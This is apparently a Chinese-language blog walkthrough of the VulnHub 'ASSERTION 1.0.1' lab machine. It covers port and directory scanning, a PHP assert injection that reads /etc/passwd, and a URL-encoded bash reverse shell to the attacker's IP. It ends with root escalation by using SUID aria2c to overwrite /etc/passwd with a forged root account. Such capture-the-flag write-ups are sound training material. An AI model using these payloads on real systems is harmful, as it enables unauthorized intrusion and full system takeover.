vulnhub - ASSERTION1.0.1

Mar10發表於2024-06-26

vulnhub - ASSERTION 1.0.1

資訊收集

nmap -sT --min-rate 10000 -p- 192.168.157.171
sudo nmap -sT -sV -sC -O -p22,80 192.168.157.171

image-20240626110759174

只開放了ssh和http,那就先從web入手

目錄掃描

sudo gobuster dir -u 192.168.157.171 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

image-20240626111649671

看了一下沒什麼可用資訊。。

本地檔案包含

點選網頁到處看看發現引數是http://192.168.157.171/index.php?page=

image-20240626111900634

目錄穿越失敗,但看錯誤提示應該是有防護,測試了一下應該是對..進行了過濾

翻閱 https://github.com/HackTricks-wiki/hacktricks/blob/master/pentesting-web/file-inclusion/README.md

image-20240626112632363

使用' and die(highlight_file('/etc/passwd')) or '成功讀取

image-20240626112734528

嘗試命令執行,打一個反彈shell

' and die(system('bash -c  "exec bash -i >& /dev/tcp/192.168.157.161/9999 0>&1"')) or '
需要URL編碼
%27%20and%20die%28system%28%27bash%20%2Dc%20%20%22exec%20bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E157%2E161%2F9999%200%3E%261%22%27%29%29%20or%20%27

image-20240626123452165

查詢具有SUID許可權的檔案

find / -perm -4000 -print 2>/dev/null

image-20240626124323535

aria2c提權

aria2c是下載檔案的程式,可以嘗試用於覆蓋 /etc/passwd

將 /etc/passwd 儲存到 kali上,生成一個具有root許可權的使用者

openssl passwd -1 -salt hacker 123456
$1$hacker$6luIRwdGpBvXdP.GMwcZp/
修改為如下格式
hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash

存入剛才儲存到kali的passwd內

image-20240626130259636

本地開啟http服務

python3 -m http.server

讓目標靶機下載修改好的passwd並覆蓋的passwd

aria2c --on-download-error=$TF http://192.168.157.161:8000/passwd --allow-overwrite=true

image-20240626130133300

root@assertion:~# cat root.txt
cat root.txt
8efabdae07730bdcb14d83e37a2e7398